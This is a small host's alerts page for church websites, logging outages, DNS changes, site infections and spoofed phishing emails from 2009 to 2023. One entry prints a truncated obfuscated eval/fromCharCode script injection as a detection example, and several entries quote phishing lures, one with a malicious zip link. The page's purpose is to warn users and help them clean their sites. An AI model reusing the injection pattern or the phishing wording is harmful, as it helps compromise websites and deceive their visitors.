Date: June 20, 2023 - - Server
VIRUS/MALWARE Issue
For
over 2 weeks now, Most or All of our sites are reporting that
sites files and folders are missing and replaced with a virus
home page (looks like scripting).
Our hosting service has initiated
scrubbing processes and is attempting to restore sites, however
this may take some time to complete. If you have copies of your
site files and folders, please FTP them up to your site and let
me know if you are successful or have any issues...
Wordpress sites will need to
follow the Wordpress procedures for site restoration.
https://sucuri.net/guides/how-to-clean-hacked-wordpress/
Date: March 20, 2016 - - Server Disk Issue
Sites are reporting that when they attempt to upload new or
update existing pages, the page shows as blank and has a
filesize of 0 bytes.
This is caused by our
server running out of space. This was caused by our LOG
files maxing out which in turn filled up all available disk
space. ALL sites that were updated recently were affected.
CORRECTION: We have cleared our log files which has
created available disk space. All sites that have this
issue must re-post your updated pages again. This will clear all
the pages that are now showing as blank.
We apologize for this
inconvenience. Please let me know if you continue to have
any issues with your FTP uploads.
Also: Please review the files that
you are keeping on your websites and delete files and pictures
that are no longer needed. If you wish to keep copies of
your files, I would suggest that you create a GOOGLE DRIVE
account (its FREE) to keep your pictures and files.
Remember, the St. Ambrose Foundation are a non profit
organization supported by occational donations and we do not
have unlimited disk space resources.
Thank you..... Roy
Date: August 27, 2014 - - EMAIL BROADCAST
ISSUE
It has been brought to our
attention that many organizations would like to use email
broadcast or email marketing to keep its members notified of
activities or issues that occur. While some sites have been
creative and created scripts that allow for mass marketing email
blasts through our servers, we would like to ask that because
our systems are shared with many Catholic organizations, that
you consider using products that are designed for such
campaigns. Our servers are not designed to handle an enourmous
amount of blasts, such as these.
Our recommendation is to use known
and effective email marketing services like;
www.mailchimp.com
www.campaignmonitor.com
www.emailbrain.com
www.streamsend.com
www.madmimi.com
www.benchmarkemail.com
www.getresponse.com
www.constantcontact.com
www.graphicmail.com
www.boomerang.com
Date: August 15, 2014 - - Many
Sites Down
Our DNS
Services with BIZWALA.net or remarkablehosting.net/.com have
ceased to function without notice. If you find that your
site has suddenly gone down without notice, please check your
domain DNS setting and change it immediately to
ns1.catholic-church.org
ns2.catholic-church.org
You must do
this through your domain registrar. When you purchased
your domain name, you should have been given access to your
domain control panel. This is where you change your domain DNS
setting. This setting is not on your hosted web site.
Date: November 5, 2013 - - All
Sites Down
Our Plesk
license expired and needed to be updated. This resulted in the
need for an emergency maintenance outage which brought all web
services down for appx 12 hours. We are now back online
with full operations. Our apologies for this interruption
of service.
Date: October 1, 2012 - - Many Sites may stop working
If you do
not have the registration for your domain with Bizwala or
Hosting Metro, and your site suddently stops working, you will
need to change your DNS settings to
ns1.catholic-church.org
ns2.catholic-church.org
Date: September 26, 2012 - -
Many Sites not working properly / ISSUES:
We have changed our DNS settings as a
result of moving to new servers. We are working to resolve
this issue.... Pls stand by.
Date: July 9, 2012 - - Script Virus / ISSUES:
VIRUS ALERT!!!!
We have identified a security
vulnerability that we believe was the cause of the repeated
attacks on our sites. This vulnerability has been closed
with the installation of the latest security patch.
As a result of these attacks, many of
our hosted sites have been identified on GOOGLE as VIRUS
INFECTED sites. If you are receiving this redirection from
GOOGLE, please do the following steps.
1. Carefully inspect (or replace) your
index.htm or index.html files for script insertion. If you have
both of these files, delete them both and install one, good
file.
Note: The virus script is usually
located at the bottom of the page and looks similar to this:
=======================================
</body>
</html>
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode
(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,
59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,
116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,
120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,
34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34.....
========================================
2. Carefully inspect other files within
your directory for this same script insertion code. (This may be
how they are reinstalling the code.)
3. Look for files within your directory
that have no relevance or should not be there. If you
don't know what they are for, (ie: templates, forms, counters,
stats, etc) DELETE these files.
4. Request that your FTP or PLESK
passwords be changed immediately. Do not share the new
password - protect it from compromise.
5. Webmasters are asked to review the
documentation found at
http://www.stopbadware.org/home/security
6. Allow 7 to 10 days to pass, since
you have cleaned your directories and feel that the infection
has been resolved. before submitting to GOOGLE as a safe site,
again.
7. Here are the steps to follow to
white-list your website:
===============
1. Goto
www.google.com/webmasters/tools/
2. Login using your gmail account logins.
3. Add A Site
4. Add the URL - add your domain name.
5. Click Alternative Method
6. Click Upload an html file
7. Download the HTML verification file
8. Upload the file to the document root
9. Confirm successful upload by visiting
http://domain.com/filename.html in your browser
10. Click Verify
11. If the verification is successful you will receive a
verification successful message
===============
Please
notify us if you find further infections
or issues. R
Date: July 1, 2012 - - Script Virus / ISSUES:
VIRUS ALERT!!!!
It has been
brought to our attention that some of our hosted websites have
been hit with malware scripting.
“I have checked several domains and our scans reported several
pages to be infected with known javascript malware. The string
"window.eval" is contained in the following files.
===========
index.html
===========
Please remove the injected code from the files.
Recommended that you reset the passwords of all accounts and
scan your local machine using any updated antivirus software. If
you are using any third party applications in your website,
please make sure that they are secure and update them to the
latest version. Once this is done, please send a request to
Google to review the website.
https://support.google.com/webmasters/bin/answer.py?hl=en&answer=35179
http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Additional
information found at
http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html
Date: August 15, 2011 - -
EMAIL Virus / ISSUES:
VIRUS ALERT!!!!
It has been
brought to our attention that our email system has been
SPOOFED and is sending out a VIRUS/MALWARE as a .zip
attachment. Remember, WE DO NOT EVER solicit or send emails
to you EXCEPT in direct response to support or services
requested. This page is our ONLY means of notifying
you of system outages due to maintenance or system failures.
The email
being sent is identified as sent from
HAIRSTONDominickExlFOrQ5mH@catholic-church.org
and states:
From:
HAIRSTONDominickExlFOrQ5mH
[mailto:HAIRSTONDominickExlFOrQ5mH@catholic-church.org]
Sent: Monday, August 15, 2011 9:30 PM
To: wvccs@catholic-church.org
Subject: Re: FW: End of July Stat. required
Hi,
As requested I give you the open Invoices issued to you as per
30th July 2011:
Regards
Dominick HAIRSTON
----------------------------
DO NOT
OPEN THE ATTACHED FILE
IN THIS EMAIL
VIRUS ALERT!!!!
Date: November 10, 2010 - -
SERVER Migration / ISSUES:
Bizwala (Our
hosting service provider) has merged with Metro Hosting and as a
result, have moved our services to the MH data Center.
This means that the IP addresses for all of our sites have
changed. If you are using an IP address to connect to FTP
instead of the domain name, you will need to change it.
All ID's and passwords remain intact as well as PORT
assignments. Please let us know if you experience
any issues.
Date: AUGUST 1, 2010 - -
SERVER CRASHED / ISSUES:
On or about July 22, 2010, our servers crashed with a
File System corruption that was unrecoverable. Bizwala
moved our hosting services to another server and had to RESTORE
all sites back to the latest BACKUP tapes they had. A
secondary issue existed whereby all of our hosted sites would
not allow any FTP or SFTP access to any of our sites.
Tonight, I
was advised that all sites are now back up with FTP for
subdomains of www.catholic-church.org and SFTP for FULL domains. YOU MUST
use a specific port for each type of connection which can not be
published on this ALERTS page. The PORT number for SFTP
remains the same as it was, however FTP now requires a new port
assignment. You must send me a request for the new FTP
port number at support@catholic-church.org .
We apologize
for this increased security inconvenience, however hopefully
this will help prevent further breaches of our systems and
attacks on our hosted sites.
I also
wanted to apologize for not updating this ALERTS page sooner,
however I, along with all of you, didn't have any way to access
www.catholic-church.org.
ROY........
Date: May 11, 2010 - -
SPOOF, VIRUS, & PHISHING EMAIL
ISSUES:
Continuing issue, our email at
support@catholic-church.org has been spoofed
in an attempt to get you to open the attached link which will download a virus or phishing
software, in order to get
your credentials - disguised as a .ZIP file. Here is a
sample of the
emails sent:
-----Original Message-----
From: catholic-church.org support [mailto:stpaulpastor@catholic-church.org]
Sent: Tuesday, May 04, 2010 12:30 PM
To: stpaulpastor@catholic-church.org
Subject: setting for your mailbox stpaulpastor@catholic-church.org
are changed
SMTP and
POP3 servers for stpaulpastor@catholic-church.org mailbox are
changed. Please carefully read the attached instructions before
updating settings.
http://groups.google.com/group/mailsv1/web/setup.zip <<<do
not click on this
DELETE THIS MESSAGE IMMEDIATELY!! We NEVER send out these
kinds of broadcast
emails. THIS ALERTS PAGE is our ONLY method for sending out
alerts and notifications. Please refer back to this page
or directly with us. We will respond to specific inquiries,
however never as a broadcast.
Date: Feb 22, 2010 - -
SPOOF, VIRUS, and PHISHING EMAIL
ISSUES:
Once again, our email has been
spoofed
in an attempt to get you to download a virus or phishing to get
your credentials - disguised as a .ZIP file. Here is the
email sent:
==========start of
message=================
"A
new settings file for the support@catholic-church.org has just
be released "
-----Original Message-----
From: catholic-church.org Team [mailto:support@catholic-church.org]
Sent: Monday, February 22, 2010 12:50 PM
To: support@catholic-church.org
Subject: A new settings file for the support@catholic-church.org
has just be released
Dear use of the catholic-church.org
mailing service!
We are informing you that because of the
security upgrade of the mailing service your mailbox
support@catholic-church.org settings were changed. In order to
apply the new set of settings open zip attached file.
Best regards, catholic-church.org
Technical Support.
==========end of message=================
If you receive this email or one like it, DELETE THIS EMAIL
IMMEDIATELY. WE DO NOT SEND OUT EMAILS LIKE THIS ! !
Date: Nov 13, 2009 - - System
UPGRADES
Over
the
next few weeks, our systems
will
be
upgraded to NEW servers and software. As a result of
these
upgrades,
site access MAY be affected for
up
to
24 hours. Another result from the new systems upgrades is
that
Microsoft's
FRONT PAGE will no longer work on our
systems.
This
means that if you have created pages using
Front
Page
extension capability, you may find that your templates,
buttons,
dhtml,
or other products that are exclusive to and rely
on
the
Front Page extensions, may no longer work.
As you most of you
are
aware,
with regard to access to your sites, FTP is no
longer
be
allowed in favor of SFTP using a specified PORT. For
those
that
are not using a FTP client that support SFTP, I
recommend
that
you download and use the FILEZILLA (The Free FTP
Solution),
as
it does support SFTP and is very easy to use.

Because Microsoft Front Page is no longer supported by both
Microsoft
and
Plesk, we are recommending a WYSIWYG Web Page
software
tool
that is FREE and very easy to use. Please
consider
downloading
Trellian Webpage.

If you are looking for an easy to use, FREE graphics
editor,
I have had some success with Paint.Net.

Date:
Nov
4,
2009 - - System
Outage
Our
servers
ran
out of DISK SPACE. This caused
many of our sites to experience a
problem
with
uploading
files. The
symptom
showed
as you were able to connect to
your site with SFTP, however
uploading
a
file never actually
started
or
completed. The
destination
file
(on the server)
showed
as
a filesize of 0.
If you were updating your "index.html"
page, and it went to filesize
0,
your
site was
virtually
inaccessible
because
the page showing would be
BLANK.
Please
make sure that you are not
uploading
files
or pictures that
are
large
than 100k.
Thank
you...... R
Dates:
Nov
3,
2009 - Nov 13, 2009 - System Outages
Greetings
from
the
Bizwala OPS center,
As
part of our commitment to
providing
high-quality
hosting
services,
maintenance
has been
planned
to
upgrade and
optimize
our
network
and servers. Both hardware and software
updates will be performed.
Please
read the maintenance schedule
details
below
carefully.
Dates: Nov 3, 2009 -
Nov
13,
2009
Components
affected
-
Individual Servers
-
Select VPS and
Nodes
-
Select Switches
Estimated downtime
duration:
10 to
40 minutes of intermittent
connectivity.
Our apologies for any
inconvenience
this
may cause, and
ask
you
to check our
status update
page
at
http://www.bizwala.com/press/
before submitting a
'service
down'
support request during
the
above
dates. If you have any
questions
or
concerns,
please do
not
hesitate
to contact us.
Bizwala OPS
Staff
10/14/2009
- SPOOF and PHISHING EMAIL
ISSUES:
Phishing/Spoofing
Alert:
Please be aware
of a new phishing/spoofing attack
proliferating
the
internet. We
have
noticed
a noticeable increase in emails
sent out as
support@catholic-church.org
These
emails are
SPOOFED
emails
that
attempt to make you think this is
sent by us and turn out to be
inappropriate
Pharmaceutical
sites,
Dating
services, or
attempts
to
get you to open an
attachment
which
contains a virus
or
malware
code - intended
to do
damage
to
your computer or collect personal/banking
information from you. [see example
below]
If
you are getting
these
types
of
security alerts please notify us right away
and please warn your parish
or
organization
not to
OPEN any
emails
from
us unless they have specifically
requested support or click on any
links
and/or
attachments
within
these
emails.
Bizwala, our
hosting service provider updates
software
directly
and
will never
require
a client
to
click
on a link to interact
with
an
update. We also do
not
send
random emails
requesting
information
updates.
THE FOLLOWING ARE
SAMPLES OF WHAT WE HAVE
RECEIVED:
******* SAMPLE SPAM
1*****************
Attention!
On October 16, 2009 server upgrade
will take place. Due to this the
system
may
be offline for
approximately
half
an hour.The
changes
will
concern
security,
reliability
and
performance of mail service and
the system as a whole.
For compatibility of your browsers
and mail clients with upgraded
server
software
you should
run SSl
certificates
update
procedure.This procedure is
quite
simple. All you have to do
is
just
to click the link
provided,
to
save the patch file
and
then
to run it from
your
computer
location.
That's all.
http://updates.your-domain.com
Thank you in advance for your
attention to this matter and sorry
for
possible
inconveniences.
System Administrator
******* // END SAMPLE SPAM
1*****************
******* SAMPLE SPAM
2*****************
-----Original Message-----
From: Marcia
Leblanc
[mailto:support@catholic-church.org]
Sent:
Wednesday,
October
14, 2009 3:01 PM
To:
support@catholic-church.org
Subject:
A
new
settings file for the support@catholic-church.org
has just been released
Dear user of the catholic-church.org
mailing service!
We are informing you that because of
the security upgrade of the
mailing
service
your mailbox
support@catholic-church.org
settings
were
changed. In order
to
apply
the
new set of settings open zip attached file.
Best regards, catholic-church.org
Technical Support.
Bizwala Staff
There is an
attachment named "install.zip"
that
is
designed to damage
your
computer
or
install keylogger code to access personal
or banking information. NEVER open
any
attachments
or click
on any
links.
******* // END SAMPLE SPAM
1*****************
9/18/2009 -
SYSTEM
ISSUES
:
Catholic-Church.org
sites have been hit with MALWARE
redirection
issues
and
several of
our
sites
are showing up in GOOGLE WARNING lists.
These are specifically related to
sites
that
allow ADWARE
pop-ups.
If
you have one of
these
sites
please disable
these
pop-ups
immediately.
Here are some screen shots
and
information regarding the
latest
Malware
issue:
CLICK HERE
CLICK
HERE
for
a list of known Malware Sites.
EFFECTIVE
IMMEDIATELY:
ALL FTP ACCESS TO OUR
WEBSITES
HAS
BEEN
DISABLED IN
FAVOR
OF
SFTP. YOUR ID AND PASSWORDS REMAIN
INTACT, HOWEVER YOU WILL NEED TO
CONTACT
US
FOR THE PORT
NUMBER TO
CONFIGURE
SFTP
software can be downloaded FREE of
charge
from:
http://filezilla-project.org/download.php?type=client
These additional measures have
been implemented to block a recent
outbreak
of
MALWARE
redirection or
VIRUS
attacks
from recurring, however we
highly
recommend that you
immediately
change
and protect
your
CP,
FTP, or FrontPage
passwords.
If you don't have
the ability to Change your
password,
please
contact us and we will reset
and
send your new password via
email.
This
email
containing
your
new
password will NOT contain the SITE name,
URL, or ID credentials. Only
the
new
password.
Additional information
regarding recent attacks and
methods
recommended
for
inspecting
and
protecting
your sites can be found at:
http://news.cnet.com/8301-1009_3-10251779-83.html
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
Additional information about SFTP
can be found at:
http://www.radinks.com/sftp/FAQ.php
SITE BACKUPS:
During our last attack, we were
successful
at recovering the index
files
for
all sites that were
identified
to
us, it took some
time
to
pull these from our
backup
tapes
and
RESTORE them to the appropriate domains.
Sites where the webmaster holds a
current
copy
of their
website,
merely
had
to reinstall the index files from their
local copy and were back online in
minutes.
A
practice
I highly
recommend
that
all of our webmasters establish.
WEBMASTER
NEED
TO
RETAIN A BACKUP OR COPY OF THEIR ENTIRE
WEBSITE ON EXTERNAL
SYSTEMS.
If you are still experiencing any
issues,
send us an email
identifying
your
site and the problems you
are
continuing
to
experience
Please use the
Support
button to open a support
request.
Thank you for
your understanding and
patience.
Saint Ambrose
Foundation